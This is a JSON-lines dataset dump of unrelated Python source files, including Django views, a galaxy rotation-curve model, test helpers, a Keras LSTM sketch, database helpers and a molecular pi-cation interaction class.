username=request.GET['username'])\n # If already a friend,redirect to friend list page.\n # (Circumvent UNIQUE constraint failed)\n if Friendship.objects.filter(from_friend=request.user, to_friend=friend).exists():\n # TODO: Add django message\n return HttpResponseRedirect(reverse(\n 'profiles:friends', kwargs={'username': request.user.username}\n ))\n friendship = Friendship(from_friend=request.user, to_friend=friend)\n friendship.save()\n return HttpResponseRedirect(reverse(\n 'profiles:user', kwargs={'username': request.user.username}\n ))\n else:\n return Http404\n\n\n@login_required\ndef friend_invite(request):\n if request.method == 'POST':\n form = FriendInvitationForm(request.POST)\n if form.is_valid():\n # Whether user already registered or not\n name = form.cleaned_data['name'],\n email = form.cleaned_data['email']\n if User.objects.filter(email=email).exists():\n # TODO: fix invitation button using css!!\n 
messages.info(request, f'{name[0]} already registered')\n return render(request, 'profiles/friend_invite.html')\n\n invitation = Invitation(\n name=form.cleaned_data['name'],\n email=form.cleaned_data['email'],\n code=User.objects.make_random_password(20),\n sender=request.user\n )\n invitation.save()\n # Send invitation email\n invitation.send()\n # TODO: disable invitation form after send out messages\n messages.success(request, 'Invitation send out successfully')\n return HttpResponseRedirect(reverse('profiles:friend_invite'))\n else:\n form = FriendInvitationForm()\n\n context = {'form': form}\n return render(request, 'profiles/friend_invite.html', context)\n\n\ndef friend_accept(request, code):\n invitation = get_object_or_404(Invitation, code__exact=code)\n request.session['invitation'] = invitation.id\n return HttpResponseRedirect(reverse('accounts:signup'))\n\n\n@login_required\ndef profile_edit(request, username):\n user = get_object_or_404(User, username=username)\n # Prevent edit other user's page\n if user != request.user:\n raise Http404\n\n profile = Profile.objects.get(user=user)\n\n form = ProfileForm(request.POST or None, instance=profile)\n if form.is_valid():\n # Save changes\n form.save()\n # obj = form.save(commit=False)\n # obj.save()\n # Redirect to get_absolute_url specified within Profile model\n # return redirect(obj)\n return HttpResponseRedirect(reverse('profiles:user', args=(user.username,)))\n\n context = {'form': form}\n return render(request, 'profiles/profile_form.html', context)\n","sub_path":"src/profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"561152066","text":"# This is an attempt at a more numerically stable, cleaned-up\n# version of the Neros calculations. 
\n# The big changes are that it uses the calculations in NumericalStability.ipynb\n# and uses and interpolated MW phi to avoid data issues\n# I'm going to implement it as a class, instead\n# of a namespace of functions, which should make using it easier\n# Particularly, since we'll be using the same Milky Way data\n# to do a family of fits, that will be a class member\n# Usage will be documented in the class\n\nimport numpy as np\nfrom scipy.interpolate import interp1d\nimport scipy.integrate\n\n\nc = 3 * (10**5) # km/s\n\nclass Neros:\n \"\"\"The Neros Model\n \n This class implements the actual computations of\n the Neros model. Since the model depends on the Milky Way\n mass curve, each instance of this class will need to be \n supplied with one. Meaning that if you want to do multiple\n Milky Way models, each will need its own instance.\n \n Create an instance by calling\n Neros(milky_way_data)\n \n The data can be in the form of a NumPy array (of shape N x 2),\n a Pandas DataFrame with two columns, or a list of tuples.\n Look at the DataImporter.py file for help reading from files \n if needed. 
The data must come in the order\n radius, vLum (it ignores Pandas column names).\n \n The Milky Way data can be changed later by calling setMilkyWay\n \"\"\"\n \n def __init__(self, milky_way_data):\n #This will check if the Milky Way data\n #is properly formatted, and raise an exception\n #if it isn't\n self.setMilkyWay(milky_way_data)\n \n def setMilkyWay(self, milky_way_data):\n \"\"\"Changes the internal Milky Way\n \n Data must be two columns in the order radius, vLum, \n either as a NumPy array, a Pandas DataFrame, or a\n list of tuples\n \n This automatically sets up the appropriate interpolators\"\"\"\n \n data = np.array(milky_way_data)\n \n if len(data.shape) != 2 or data.shape[0] < 2 or data.shape[1] != 2:\n raise ValueError(\"Milky Way data was not in the form of two columns\")\n \n #Retain the data, just in case, but we'll mostly be doing interpolation\n self.milky_way_data = data\n self.mw_vLum_interp = interp1d(data[:,0], data[:,1], kind='cubic')\n mw_phi = self.phi(data[:,0], data[:,1])\n self.mw_phi_interp = interp1d(data[:,0], mw_phi)\n \n def phi(self, radius, vlum):\n \"\"\"Computes potential. 
phi = integrate vlum^2/r/c^2\"\"\"\n \n x = radius\n y = np.square(vlum) / (x*c*c)\n x = np.concatenate([np.array([0]), x])\n y = np.concatenate([np.array([0]), y])\n #May want to switch to Simpson's rule: scipy.integrate.simps\n return scipy.integrate.cumtrapz(y,x)\n \n def vNeros(self, galaxy_rad, galaxy_vLum, alpha, phi_zero=3e-11):\n \"\"\"This computes the predicted vObs\n \n The parameters are\n :galaxy_rad: A 1-D NumPy array or Pandas DataSeries of radii\n :galaxy_vLum: A 1-D NumPy array or Pandas DataSeries of vLums\n :alpha: From the equation vObs^2 = vLum^2 + alpha*vLCM^2\n :phi_zero: The zero point for the phi integration, used in kappa calculation\n \n This calls sqrt internally, so it can fail for some values of alpha.\"\"\"\n \n return np.sqrt(self.vNerosSquared(galaxy_rad, galaxy_vLum, alpha, phi_zero=3e-11))\n \n def vNerosSquared(self, galaxy_rad, galaxy_vLum, alpha, phi_zero=3e-11):\n \"\"\"This computes the predicted vObs^2, basically by calling vLCM and applying alpha\n \n The parameters are\n :galaxy_rad: A 1-D NumPy array or Pandas DataSeries of radii\n :galaxy_vLum: A 1-D NumPy array or Pandas DataSeries of vLums\n :alpha: From the equation vObs^2 = vLum^2 + alpha*vLCM^2\n :phi_zero: The zero point for the phi integration, used in kappa calculation\n \n This avoids the issues inherent in calling sqrt, but can produce non-physical vObs^2\"\"\"\n \n vLCM = self.vLCM(galaxy_rad, galaxy_vLum, phi_zero)\n \n return np.square(galaxy_vLum) + alpha*vLCM\n \n def vLCM(self, galaxy_rad, galaxy_vLum, phi_zero=3e-11):\n \"\"\"This computes the vLCM - the actual model\n \n The parameters are\n :galaxy_rad: A 1-D NumPy array or Pandas DataSeries of radii\n :galaxy_vLum: A 1-D NumPy array or Pandas DataSeries of vLums\n :alpha: From the equation vObs^2 = vLum^2 + alpha*vLCM^2\n :phi_zero: The zero point for the phi integration, used in kappa calculation\"\"\"\n \n MW_phi = self.mw_phi_interp(galaxy_rad)\n galaxy_phi = self.phi(galaxy_rad, galaxy_vLum)\n k = 
self.kappa(MW_phi, galaxy_phi, phi_zero)\n v1 = self.v1(MW_phi, galaxy_phi)\n v2 = self.v2(MW_phi, galaxy_phi, galaxy_vLum)\n vLCM = c * c * k * k * v1 * v2\n \n return vLCM\n \n def kappa(self, MW_phi, other_phi, phi_zero=3e-11):\n \"\"\"kappa(r) in the paper, just phi_gal(r)/phi_mw(r)\"\"\"\n \n return (other_phi - phi_zero) / (MW_phi - phi_zero)\n \n def v1(self, MW_phi, other_phi):\n etc = self._eTsiCurveMinusOne(MW_phi, other_phi)\n num = etc**2\n den = (1 + etc)**2 + 1\n return num/den\n \n def v2(self, MW_phi, other_phi, other_vlum):\n etFlat = self._eTsiFlatMinusOne(other_vlum)\n etCurve = self._eTsiCurveMinusOne(MW_phi, other_phi)\n num = 2 + etFlat + etCurve\n den = etFlat - etCurve\n return num/den\n \n def _eTsiFlatMinusOne(self, other_vlum):\n \"\"\"This computes eTsiFlat - 1, compared to the old code, for numerical stability\"\"\"\n \n beta = other_vlum / c\n numerator = 2*beta / (1 - beta)\n denominator = np.sqrt((1+beta) / (1-beta)) + 1\n return numerator / denominator\n \n def _eTsiCurveMinusOne(self, MW_phi, other_phi):\n \"\"\"This computes eTsiFlat - 1, compared to the old code, for numerical stability\"\"\"\n\n numerator = (2*other_phi - 2*MW_phi) / (1 - 2*other_phi)\n denominator = np.sqrt((1 - 2*MW_phi) / (1 - 2*other_phi)) + 1\n return numerator / denominator\n","sub_path":"Neros_v2.py","file_name":"Neros_v2.py","file_ext":"py","file_size_in_byte":6225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"580526536","text":"from site_settings import path\nfrom site_settings import *\n\nDATABASE_ENGINE = 'sqlite3'\nDATABASE_NAME = path('db.sqlite3')\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# URL prefix for admin media -- CSS, JavaScript and images. 
Make sure to use a\n# trailing slash.\n# Examples: \"http://foo.com/media/\", \"/media/\".\nADMIN_MEDIA_PREFIX = '/admin-media/'\n","sub_path":"skel/settings/dev_settings.py","file_name":"dev_settings.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"497363375","text":"from plenum.test.sdk.conftest import sdk_send_signed_requests, sdk_get_replies, sdk_send_random_requests\nfrom plenum.test.batching_3pc.helper import checkNodesHaveSameRoots\nfrom plenum.test import waits\n\n\ndef send_and_check(signed_reqs, looper, txnPoolNodeSet, pool_h, timeout=None):\n if not timeout:\n timeout_per_request = waits.expectedTransactionExecutionTime(len(txnPoolNodeSet))\n # here we try to take into account what timeout for execution\n # N request - total_timeout should be in\n # timeout_per_request < total_timeout < timeout_per_request * N\n # we cannot just take (timeout_per_request * N) because it is so huge.\n # (for timeout_per_request=5 and N=10, total_timeout=50sec)\n # lets start with some simple formula:\n timeout = (1 + len(signed_reqs) / 10) * timeout_per_request\n\n results = sdk_send_signed_requests(pool_h, signed_reqs)\n sdk_get_replies(looper, results, timeout=timeout)\n checkNodesHaveSameRoots(txnPoolNodeSet)\n\n\ndef send_random_and_check(looper, txnPoolNodeSet, sdk_pool, sdk_wallet, count,\n customTimeoutPerReq: float = None, add_delay_to_timeout: float = 0,\n override_timeout_limit=False, total_timeout=None):\n if not total_timeout:\n node_count = len(txnPoolNodeSet)\n timeout_per_request = customTimeoutPerReq or waits.expectedTransactionExecutionTime(node_count)\n timeout_per_request += add_delay_to_timeout\n # here we try to take into account what timeout for execution\n # N request - total_timeout should be in\n # timeout_per_request < total_timeout < timeout_per_request * N\n # we cannot just take (timeout_per_request * N) because it is so huge.\n # (for 
timeout_per_request=5 and N=10, total_timeout=50sec)\n # lets start with some simple formula:\n total_timeout = (1 + count / 10) * timeout_per_request\n\n sdk_reqs = sdk_send_random_requests(looper, sdk_pool, sdk_wallet, count)\n sdk_repl = sdk_get_replies(looper, sdk_reqs, timeout=total_timeout)\n return sdk_repl\n\n\ndef send_batches_of_random_and_check(looper, txnPoolNodeSet, sdk_pool, sdk_wallet, num_reqs, num_batches=1, **kwargs):\n # This method assumes that `num_reqs` <= num_batches*MaxbatchSize\n if num_batches == 1:\n return send_random_and_check(looper, txnPoolNodeSet, sdk_pool, sdk_wallet, num_reqs, **kwargs)\n\n sdk_resps = []\n for _ in range(num_batches - 1):\n sdk_resps.extend(send_random_and_check(looper, txnPoolNodeSet, sdk_pool, sdk_wallet,\n num_reqs // num_batches, **kwargs))\n rem = num_reqs % num_batches\n if rem == 0:\n rem = num_reqs // num_batches\n sdk_resps.extend(send_random_and_check(looper, txnPoolNodeSet, sdk_pool, sdk_wallet, rem, **kwargs))\n return sdk_resps\n","sub_path":"plenum/test/sdk/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"616665742","text":"import sys\nsys.stdin = open('input/boj_1520_내리막길.txt', 'r')\n# import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10000)\ndy, dx = [-1, 1, 0, 0], [0, 0, -1, 1]\n\ndef dfs(r, c):\n if r == 0 and c == 0:\n return 1\n if memo[r][c] == -1:\n memo[r][c] = 0\n for i in range(4):\n dr, dc = r + dx[i], c + dy[i]\n if 0 <= dr < ROW and 0 <= dc < COL and M[dr][dc] > M[r][c]:\n memo[r][c] += dfs(dr, dc)\n return memo[r][c]\n\n\n\nROW, COL = list(map(int, input().split()))\nM = [list(map(int, input().split())) for i in range(ROW)]\nmemo = [[-1 for _ in range(COL)] for _ in range(ROW)]\n\ndfs(ROW-1, 
COL-1)\n\nprint(memo[ROW-1][COL-1])","sub_path":"이동규/DP_2/boj_1520_내리막길.py","file_name":"boj_1520_내리막길.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"482701719","text":"import sys\n\ndef collatz(i):\n if i % 2 == 0:\n return i // 2\n else:\n return 3 * i + 1\n\ndef main():\n if sys.argv[1]:\n s = sys.argv[1]\n else:\n s = input('Enter integer: ')\n i = int(s)\n steps = 0\n while i != 1:\n print(i)\n i = collatz(i)\n steps += 1\n print(i)\n print('steps: %s' % (steps, ))\n\nif __name__ == '__main__':\n main()\n","sub_path":"ch03/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"287622676","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nfrom tensorflow.keras import Model\nimport tensorflow_hub as hub\nfrom tensorflow.keras.layers import Input, LSTM, Dense, Embedding\n\n\nclass LSTMSeqModel(Model):\n def __init__(self):\n pass\n\n def build_model(\n self,\n depth,\n encoder_units,\n vocab_size,\n use_embedding_layer=False,\n embedding_dim=100,\n encoder_input_shape=(300),\n decoder_input_shape=(300),\n batch_size=None,\n ):\n\n # BUILD ENCODER FOR TRAINING\n self.encoder_inputs = Input(shape=encoder_input_shape, batch_size=batch_size, name='encoder_input')\n embedding\n\n encoder_outputs = []\n self.encoder_states = []\n x_encoder = embeded_encoder_inputs\n for layer in range(depth):\n encoder_layer_outputs, state_h, state_c = LSTM(\n encoder_units,\n return_sequences=True,\n return_state=True,\n name=f'encoder_lstm-{layer + 1}',\n )(x_encoder)\n x_encoder = encoder_layer_outputs\n encoder_outputs.append(encoder_layer_outputs)\n # Only care about the states of the encoder\n self.encoder_states.append([state_h, state_c])\n\n # BUILD DECODER FOR TRAINING\n decoder_inputs = Input(shape=decoder_input_shape, batch_size=batch_size, 
name='decoder_input')\n if use_embedding_layer:\n embedded_decoder_inputs = input_embedding(decoder_inputs)\n else:\n embedded_decoder_inputs = decoder_inputs\n\n decoder_layers = []\n x_decoder = embedded_decoder_inputs\n for layer in range(depth):\n decoder_layer = LSTM(\n encoder_units,\n return_sequences=True,\n return_state=True,\n name=f'decoder_lstm-{layer + 1}',\n )\n decoder_layers.append(decoder_layer)\n x_decoder, _, _ = decoder_layer(x_decoder, initial_state=self.encoder_states[layer])\n decoder_output = x_decoder\n\n decoder_dense = Dense(vocab_size, activation='softmax', name='decoder_ouput')\n decoder_outputs = decoder_dense(x_decoder)\n self.model = Model([self.encoder_inputs, decoder_inputs], decoder_output)\n\n # Inference model --------------------------------------------------------\n\n # self.encoder_model = Model(self.encoder_inputs, self.encoder_states)\n\n # decoder_states_inputs = []\n # decoder_states_outputs = []\n # x_decoder = embedded_decoder_inputs\n # for layer in range(depth):\n # decoder_layer_state_input_h = Input(shape=(encoder_units, ), batch_size=batch_size, name=f'decoder_h_input-{layer+1}')\n # decoder_layer_state_input_c = Input(shape=(encoder_units, ), batch_size=batch_size, name=f'decoder_c_input-{layer+1}')\n # decoder_layer_state_inputs = [decoder_layer_state_input_h, decoder_layer_state_input_c]\n # decoder_states_inputs.append(decoder_layer_state_inputs)\n\n # decoder_outputs, state_h, state_c = decoder_layers[layer](\n # x_decoder, initial_state=decoder_layer_state_inputs\n # )\n # x_decoder = decoder_outputs\n # decoder_states_outputs.append([state_h, state_c])\n\n # decoder_outputs = decoder_dense(decoder_outputs)\n # self.decoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states_outputs)\n\n # self.inferenece_model = [self.encoder_model, self.decoder_model]\n # , encoder_model, decoder_model\n\n def compile_model(self):\n self.model.compile(optimizer='Adam', 
loss='sparse_categorical_crossentropy')\n\n\nclass PreTrainedEmbedding(tf.keras.layers.Layer):\n def __init__(self, mask_value='', **kwargs):\n super(PreTrainedEmbedding, self).__init__(**kwargs)\n self.embedding = hub.KerasLayer(\n \"https://tfhub.dev/google/tf2-preview/nnlm-en-dim50-with-normalization/1\", dtype=tf.string,\n input_shape=[[]], output_shape=[50]\n )\n self.mask_value = mask_value\n\n def call(self, inputs):\n x = self.embedding(inputs)\n return x\n\n def compute_mask(self, inputs, mask=None):\n return inputs == self.mask_value\n\n","sub_path":"src/archive/lstm_seq.py","file_name":"lstm_seq.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"140400934","text":"from django.urls import reverse_lazy, reverse\nfrom django.views import generic\nfrom django.shortcuts import render\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth import (\n get_user_model, logout as auth_logout,\n)\nfrom rarestudy.models.article import Article\nfrom rarestudy.forms import UserCreateForm, EditUserForm\n\nUser = get_user_model()\n\nclass SignUpView(generic.CreateView):\n form_class = UserCreateForm\n success_url = reverse_lazy('login')\n template_name = 'registration/signup.html'\n\n\nclass ProfileView(LoginRequiredMixin, generic.ListView):\n model = Article\n template_name = 'registration/profile.html'\n context_object_name = 'Articles'\n paginate_by = 10\n\n def get_queryset(self):\n return Article.objects.filter(user=self.request.user).filter(valid=True).order_by('-created_at')\n\nclass DeleteView(LoginRequiredMixin, generic.View):\n\n def get(self, *args, **kwargs):\n user = User.objects.get(email=self.request.user.email)\n user.is_active = False\n user.save()\n auth_logout(self.request)\n return render(self.request,'registration/delete_complete.html')\n\nclass EditView(LoginRequiredMixin, generic.UpdateView):\n template_name = 
'registration/edit.html'\n model = User\n success_url = reverse_lazy('rarestudy:profile')\n form_class = EditUserForm","sub_path":"rarestudy/views/accountView.py","file_name":"accountView.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223170102","text":"import sqlite3\n\nconnection = sqlite3.connect(\"test.db\")\n\nc = connection.cursor()\n\nc.execute(\"\"\"\nCREATE TABLE IF NOT EXISTS tests (\n id integer PRIMARY KEY,\n test_int integer,\n test_text text\n)\n\"\"\")\n\nc.execute(\"\"\"\nINSERT INTO tests VALUES (1, 2, \"test1\")\n\"\"\")\n\nc.execute(\"\"\"\nINSERT INTO tests VALUES (2, 150, \"test2\")\n\"\"\")\n\nc.connection.commit()\n\nfor item in c.execute(\"SELECT * FROM tests\"):\n print(item)","sub_path":"sql-test.py","file_name":"sql-test.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"474030446","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nThe MIT License (MIT)\n\nCopyright (c) 2015-2016 Rapptz\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the\nSoftware is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\nDEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport sys\nimport asyncio\nimport aiohttp\nfrom .message import Message\nfrom .object import Object\n\nPY35 = sys.version_info >= (3, 5)\n\nclass LogsFromIterator:\n def __init__(self, client, channel, limit, before, after):\n self.client = client\n self.channel = channel\n self.limit = limit\n self.before = before\n self.after = after\n self.messages = asyncio.Queue()\n\n @asyncio.coroutine\n def fill_messages(self):\n if self.limit > 0:\n retrieve = self.limit if self.limit <= 100 else 100\n data = yield from self.client._logs_from(self.channel, retrieve, self.before, self.after)\n if len(data):\n self.limit -= retrieve\n self.before = Object(id=data[-1]['id'])\n for element in data:\n yield from self.messages.put(Message(channel=self.channel, **element))\n\n if PY35:\n @asyncio.coroutine\n def __aiter__(self):\n return self\n\n @asyncio.coroutine\n def __anext__(self):\n if self.messages.empty():\n yield from self.fill_messages()\n\n try:\n msg = self.messages.get_nowait()\n return msg\n except asyncio.QueueEmpty:\n # if we're still empty at this point...\n # we didn't get any new messages so stop looping\n raise StopAsyncIteration()\n","sub_path":"discord/iterators.py","file_name":"iterators.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"409891210","text":"\"\"\"API Lookups\"\"\"\nimport logging\nimport requests\n\n\nclass APILookup:\n ############################################################\n # constructor\n ############################################################\n def __init__(self, postcode_api_url):\n\n self.postcode_api_url = postcode_api_url\n self.LOGGER = 
logging.getLogger(__name__)\n\n ############################################################\n # str\n ############################################################\n def __str__(self):\n\n return repr(self.postcode_api_url)\n\n ############################################################\n # Lookup postcode on API to get lat/long\n ############################################################\n\n def do_postcode_lookup(self, post_code):\n \"\"\"Do API postcode lookup\n\n Keyword arguments:\n api_url -- URL for the API call\n post_code -- passed post code to lookup\n \"\"\"\n\n try:\n data = ''\n lkp_url = self.postcode_api_url + str(post_code)\n\n resp = requests.get(url=lkp_url)\n data = resp.json()\n self.LOGGER.debug(data)\n\n except Exception as exrec:\n\n self.LOGGER.error(\"Error in do_postcode_lookup %s\", str(exrec.data), exc_info=True)\n\n finally:\n return data\n","sub_path":"APILookup.py","file_name":"APILookup.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"215686767","text":"# coding:utf-8\n\nimport psycopg2\nfrom psycopg2 import sql\n\nimport json\n\nDB_NAME = 'VKinder'\nDB_USER = 'VKinder'\nUSER_PASSWORD = '1234'\nconn = psycopg2.connect(\n dbname=DB_NAME, user=DB_USER, password=USER_PASSWORD,\n host='localhost', port='5432')\n\n\ndef execute_context(query, *args):\n with conn:\n with conn.cursor() as curs:\n curs.execute(query, *args)\n\n\ndef create_user_matches_table():\n query = sql.SQL('CREATE TABLE IF NOT EXISTS user_matches ('\n 'id SERIAL PRIMARY KEY NOT NULL,'\n 'user_vk_id INT NOT NULL,'\n 'match_vk_id INT NOT NULL,'\n 'black_list BOOLEAN DEFAULT FALSE,'\n 'favourite_list BOOLEAN DEFAULT FALSE'\n ')')\n execute_context(query)\n\n\ndef create_photos_table():\n query = sql.SQL('CREATE TABLE IF NOT EXISTS photos ('\n 'photo_id SERIAL PRIMARY KEY NOT NULL,'\n 'match_user_vk_id INT NOT NULL,'\n 'photo_url CHAR(250)'\n ')')\n 
execute_context(query)\n\n\ndef add_matches(user_vk_id, match_vk_id):\n query = sql.SQL('INSERT INTO user_matches (user_vk_id, match_vk_id) '\n 'SELECT %s, %s '\n 'WHERE NOT EXISTS (SELECT * FROM user_matches '\n 'WHERE user_vk_id= %s AND match_vk_id= %s)')\n execute_context(query, (user_vk_id, match_vk_id, user_vk_id, match_vk_id))\n\n\ndef add_photo(match_user_id, photo_link):\n query = sql.SQL('INSERT INTO photos (match_user_vk_id, photo_url) '\n 'SELECT %s, %s'\n 'WHERE NOT EXISTS (SELECT * FROM photos '\n 'WHERE match_user_vk_id= %s AND photo_url= %s)')\n execute_context(query,\n (match_user_id, photo_link, match_user_id, photo_link))\n\n\ndef get_match_user_id(match_user_vk_id):\n curs = conn.cursor()\n curs.execute('SELECT id FROM user_matches WHERE match_vk_id = (%s)',\n (match_user_vk_id,))\n tmp = curs.fetchall()\n curs.close()\n return tmp[0][0]\n\n\ndef get_10_matches(user_vk_id):\n curs = conn.cursor()\n curs.execute('SELECT match_vk_id FROM user_matches '\n 'WHERE user_vk_id = (%s) '\n 'AND black_list = FALSE LIMIT 10',\n (user_vk_id,))\n tmp = curs.fetchall()\n curs.close()\n matches_list = []\n for m in tmp:\n matches_list.append(m[0])\n return matches_list\n\n\ndef get_photos_by_id(id):\n curs = conn.cursor()\n curs.execute('SELECT photo_url FROM photos WHERE match_user_vk_id = (%s)',\n (id,))\n tmp = curs.fetchall()\n curs.close()\n photo_list = []\n for p in tmp:\n photo_list.append(p[0])\n return photo_list\n\n\ndef add_to_black_list(id):\n query = sql.SQL('UPDATE user_matches SET black_list = true '\n 'WHERE match_vk_id = (%s)')\n execute_context(query, (id,))\n\n\ndef get_users_id_list():\n curs = conn.cursor()\n curs.execute('SELECT user_vk_id FROM user_matches')\n tmp = curs.fetchall()\n curs.close()\n users_list = []\n for u in tmp:\n users_list.append(u[0])\n return users_list\n\n\ndef write_to_json(user_id):\n first_10 = {}\n for u in get_10_matches(user_id):\n first_10[u] = get_photos_by_id(u)\n add_to_black_list(u)\n\n with 
open(f'files/matches_for_{user_id}.json',\n 'w', encoding='utf-8-sig') as file:\n json.dump(first_10, file, indent=3)","sub_path":"app/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"68344738","text":"\"\"\"The PiCation module defines the PiCationType and\nPiCationInx for explicit hydrogens.\n\n\"\"\"\n\n\nimport itertools as it\nfrom collections import namedtuple\n\nimport numpy as np\nimport numpy.linalg as la\nfrom scipy.spatial.distance import cdist, euclidean\n\nimport mastic.config.interactions as masticinxconfig\nfrom mastic.interactions.interactions import InteractionType, Interaction, InteractionError\n\nclass PiCationType(InteractionType):\n \"\"\"Defines an InteractionType class for hydrogen bonds between members\n with explicit hydrogens.\n\n \"\"\"\n\n attributes = {}\n interaction_name = \"PiCation\"\n feature_keys = masticinxconfig.PICATION_FEATURE_KEYS\n feature_classifiers = masticinxconfig.PICATION_FEATURES\n degree = masticinxconfig.PICATION_COMMUTATIVITY\n commutative = masticinxconfig.PICATION_COMMUTATIVITY\n interaction_param_keys = masticinxconfig.PICATION_PARAM_KEYS\n\n # parameters set from the config file\n centroid_max_distance = masticinxconfig.PICATION_CENTROID_DIST_MAX\n centroid_offset_max = masticinxconfig.PICATION_OFFSET_MAX\n amine_normal_angle_min = masticinxconfig.PICATION_AMINE_NORMAL_ANGLE_MIN\n tertiary_amine_feature_classifiers = masticinxconfig.PICATION_TERTIARY_AMINE_FEATURE\n heavy_atoms = masticinxconfig.PICATION_HEAVY_ATOMS_ELEMENT_SYMBOLS\n\n def __init__(self, pi_stacking_type_name,\n feature_types=None,\n association_type=None,\n assoc_member_pair_idxs=None,\n **pi_stacking_attrs):\n\n super().__init__(pi_stacking_type_name,\n feature_types=feature_types,\n association_type=association_type,\n assoc_member_pair_idxs=assoc_member_pair_idxs,\n **pi_stacking_attrs)\n\n @staticmethod\n def 
interaction_constructor(*params, **kwargs):\n return PiCationInx(*params, **kwargs)\n\n @classmethod\n def find_hits(cls, members,\n interaction_classes=None,\n return_feature_keys=False,\n return_failed_hits=False):\n\n # TODO value checks\n\n # scan the pairs for hits and assign interaction classes if given\n return super().find_hits(members,\n interaction_classes=interaction_classes,\n return_feature_keys=return_feature_keys,\n return_failed_hits=return_failed_hits)\n\n @classmethod\n def check(cls, arom, cation):\n\n features = [arom, cation]\n feature_tests = [cls.test_features_centroid_distance,\n cls.test_features_centroid_offset,\n cls.test_features_tertiary_amine]\n\n return super().check(features, feature_tests)\n\n\n\n @classmethod\n def check_centroid_distance(cls, distance):\n \"\"\"For a float distance checks if it is less than the configuration\n file HBOND_DIST_MAX value.\n\n \"\"\"\n if distance <= cls.centroid_max_distance:\n return True\n else:\n return False\n\n @classmethod\n def check_centroid_offset_distance(cls, distance):\n \"\"\"For a float distance checks if it is less than the configuration\n file HBOND_DIST_MAX value.\n\n \"\"\"\n if distance <= cls.centroid_offset_max:\n return True\n else:\n return False\n\n @classmethod\n def test_features_centroid_distance(cls, arom, cation):\n arom_heavy_atom_coords = np.array([atom.coords for atom in arom.atoms if\n atom.atom_type.element in cls.heavy_atoms])\n arom_centroid = calc_centroid(arom_heavy_atom_coords)\n cation_coords = cation.atoms[0].coords\n centroid_distance = euclidean(arom_centroid, cation_coords)\n\n if cls.check_centroid_distance(centroid_distance) is False:\n return False, centroid_distance\n else:\n return True, centroid_distance\n\n @classmethod\n def test_features_centroid_offset(cls, arom, cation):\n arom_heavy_atom_coords = np.array([atom.coords for atom in arom.atoms if\n atom.atom_type.element in cls.heavy_atoms])\n cation_coord = cation.atoms[0].coords\n # calculate 
the centroid offset\n centroid_offset = calc_centroid_offset(arom_a_heavy_atom_coords,\n cation_coord)\n\n if cls.check_centroid_offset_distance(centroid_offset) is False:\n return False, centroid_offset\n else:\n return True, centroid_offset\n\n @classmethod\n def test_features_tertiary_amine(cls, arom, cation):\n # check for if the cation is a tertiary amine\n if True:\n return True, None\n\n tertiary_amine_angle = calc_tertiary_amine_angle(cation)\n\n if cls.check_tertiary_amine_angle(tertiary_amine_angle):\n return False, tertiary_amine_angle\n else:\n return True, tertiary_amine_angle\n\n @property\n def record(self):\n record_fields = ['interaction_class', 'interaction_type',\n 'association_type', 'assoc_member_pair_idxs',\n 'arom_a_feature_type', 'arom_b_feature_type'] + \\\n list(self.attributes_data.keys())\n PiCationTypeRecord = namedtuple('PiCationTypeRecord', record_fields)\n record_attr = {'interaction_class' : self.name}\n record_attr['interaction_type'] = self.interaction_name\n record_attr['association_type'] 